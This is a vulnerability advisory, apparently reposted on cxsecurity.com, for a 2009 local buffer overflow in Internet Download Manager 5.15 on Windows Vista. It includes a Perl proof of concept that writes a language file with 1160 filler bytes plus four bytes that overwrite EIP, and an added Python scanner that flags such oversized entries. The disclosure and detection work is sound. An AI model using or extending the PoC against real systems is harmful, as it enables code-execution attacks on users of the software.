Internet Download Manager Local Buffer Overflow Vulnerability

2009-02-25 / 2009-02-27
Credit: musashi
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

Affected Software: Internet Download Manager v5.15 Build 3 (4/December)

Description of Vulnerability:
Hellcode Research has discovered a local buffer overflow vulnerability in Internet Download Manager. The REMOTE buffer on the stack overflows when a long toolbar name is specified in the language file on Vista (not the default English language file).

Vulnerable version: Internet Download Manager v5.15 Build 3 (4/December)
Platform: Windows Vista SP1
Solution: Update to a newer version.

Credits:
Discovered by musashi aka karak0rsan, Hellcode Research.
http://tcc.hellcode.net
musashi[at]hellcode.net
Special thanks to murderkey.

#####################PoC######################################
#Internet Download Manager v.5.15 Build 3 (4 December)
#Works on Vista
#HellCode Labs || TCC Group || http://tcc.hellcode.net
#Bug was found by "musashi" aka karak0rsan [musashi@hellcode.net]
#thanx to murderkey

# Name of the language file to generate
$file="idm_tr.lng";
# Language header line of the file
$lng= "lang=0x1f Trke";
# 1160 filler bytes followed by the 4 bytes that land in EIP
$buffer = "\x90" x 1160;
$eip = "AAAA";
# String ID of the toolbar name entry
$toolbar = "20376=";
$packet=$toolbar.$buffer.$eip;
open(file, '>' . $file) or die "Cannot open $file: $!";
print file $lng;
print file "\n";
print file $packet;
close(file);
print "File has created!\n";
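A defensive check for the file format shown in the PoC, added here as an example and not part of the original advisory: it scans a `.lng` file for `key=value` entries whose value is far longer than any translated UI string should be. The `key=value` layout is inferred from the PoC alone, and the 256-byte limit, the function names and the sample data are assumptions of this example.

```python
import re

# Assumed policy limit for one translated string. The advisory does not give
# the size of the stack buffer, only that 1160 filler bytes precede EIP.
MAX_VALUE_LEN = 256

# key=value layout as inferred from the PoC ("lang=..." and "20376=...")
ENTRY_RE = re.compile(rb"^([0-9A-Za-z_]+)=(.*)$")


def scan_lng(data: bytes, max_len: int = MAX_VALUE_LEN):
    """Return (line_no, key, value_len, reasons) for each suspicious entry."""
    findings = []
    for line_no, raw in enumerate(data.splitlines(), start=1):
        m = ENTRY_RE.match(raw)
        if not m:
            continue  # blank line or anything that is not key=value
        key, value = m.group(1).decode("ascii"), m.group(2)
        reasons = []
        if len(value) > max_len:
            reasons.append("overlong")
        # UI text has no reason to carry control bytes (tab is tolerated)
        if any(b < 0x20 and b != 0x09 for b in value):
            reasons.append("control-bytes")
        # 64 or more copies of the same byte in a row is filler, not a label
        if re.search(rb"(.)\1{63,}", value, re.DOTALL):
            reasons.append("repeated-byte-run")
        if reasons:
            findings.append((line_no, key, len(value), reasons))
    return findings


def build_samples():
    """Constructed inputs: a benign file and one shaped like the PoC output."""
    benign = b"lang=0x00 Sample\n20376=Main toolbar\n20377=Start download\n"
    oversized = b"lang=0x1f Sample\n20376=" + b"\x90" * 1160 + b"AAAA\n"
    return benign, oversized


if __name__ == "__main__":
    for name, blob in zip(("benign", "oversized"), build_samples()):
        print(name, scan_lng(blob))
```
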

References:

http://tcc.hellcode.net



Copyright 2024, cxsecurity.com

 
